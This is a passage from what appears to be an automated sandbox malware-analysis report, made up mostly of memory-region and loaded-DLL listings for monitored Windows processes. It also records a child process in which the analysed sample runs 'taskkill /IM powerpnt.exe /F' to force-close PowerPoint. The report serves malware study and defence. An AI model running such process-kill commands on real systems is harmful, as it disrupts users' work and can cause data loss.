0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 1908 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1909 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1910 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2145 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2146 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2147 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2148 start_va = 0x140000 end_va = 0x146fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 2149 start_va = 0x150000 end_va = 0x151fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 2150 start_va = 0x160000 end_va = 0x163fff entry_point = 0x160000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 2151 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 2152 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 2153 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 2154 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2155 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 2156 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 2157 start_va = 0x400000 end_va = 0x587fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2158 start_va = 0x590000 end_va = 0x710fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 2159 start_va = 0x720000 end_va = 0x1b1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 2160 start_va = 0x1b20000 end_va = 0x1bdffff entry_point = 0x1b20000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2161 start_va = 0x1c00000 end_va = 0x1c7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 2162 start_va = 0x1ca0000 end_va = 0x1d1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 2163 start_va = 0x1da0000 end_va = 0x1e1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001da0000" filename = "" Region: id = 2164 start_va = 0x1e20000 end_va = 0x20eefff entry_point = 0x1e20000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2165 start_va = 0x2200000 end_va = 0x227ffff entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 2166 start_va = 0x2290000 end_va = 0x230ffff entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 2167 start_va = 0x2400000 end_va = 0x247ffff entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 2168 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2169 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2170 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2171 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 2172 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2173 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2174 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 2175 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 2176 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2177 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2178 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2179 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2180 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2181 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2182 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2183 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 2184 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2185 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2186 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2187 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2188 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2189 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2190 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2191 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2192 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2193 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2194 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2195 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2196 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2197 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2198 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2199 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2200 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2201 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2202 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2203 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2204 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 2205 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 2206 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 2207 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Thread: id = 179 os_tid = 0x8c4 Thread: id = 197 os_tid = 0x96c Thread: id = 202 os_tid = 0x9cc Thread: id = 205 os_tid = 0x9e0 Thread: id = 206 os_tid = 0xa10 Process: id = "27" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x73cfc000" os_pid = "0x8bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM powerpnt.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1911 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1912 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1913 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1914 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1915 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1916 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1917 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1918 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 1919 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1920 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1921 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 1922 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1923 start_va = 0xe0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1924 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1925 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2365 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2366 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2367 start_va = 0xd0000 end_va = 0xd6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2368 start_va = 0x1e0000 end_va = 0x246fff entry_point = 0x1e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2369 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 2370 start_va = 0x350000 end_va = 0x351fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 2371 start_va = 0x360000 end_va = 0x363fff entry_point = 0x360000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 2372 start_va = 0x370000 end_va = 0x370fff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 2373 start_va = 0x380000 end_va = 0x380fff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 2374 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 2375 start_va = 0x3a0000 end_va = 0x527fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 2376 start_va = 0x530000 end_va = 0x6b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2377 start_va = 0x6c0000 end_va = 0x1abffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 2378 start_va = 0x1ac0000 end_va = 0x1b7ffff entry_point = 0x1ac0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2379 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 2380 start_va = 0x1b90000 end_va = 0x1b90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b90000" filename = "" Region: id = 2381 start_va = 0x1bf0000 end_va = 0x1c6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001bf0000" filename = "" Region: id = 2382 start_va = 0x1cb0000 end_va = 0x1d2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 2383 start_va = 0x1d50000 end_va = 0x1dcffff entry_point = 0x0 region_type = private name = "private_0x0000000001d50000" filename = "" Region: id = 2384 start_va = 0x1e30000 end_va = 0x1eaffff entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 2385 start_va = 0x1eb0000 end_va = 0x217efff entry_point = 0x1eb0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2386 start_va = 0x2290000 end_va = 0x230ffff entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 2387 start_va = 0x2320000 end_va = 0x239ffff entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 2388 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2389 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2390 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2391 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 2392 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2393 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2394 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 2395 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 2396 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2397 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2398 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2399 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2400 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2401 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2402 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2403 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 2404 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2405 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2406 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2407 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2408 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2409 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2410 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2411 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2412 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2413 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2414 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2415 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2416 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2417 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2418 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2419 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2420 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2421 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2422 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2423 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2424 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 2425 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 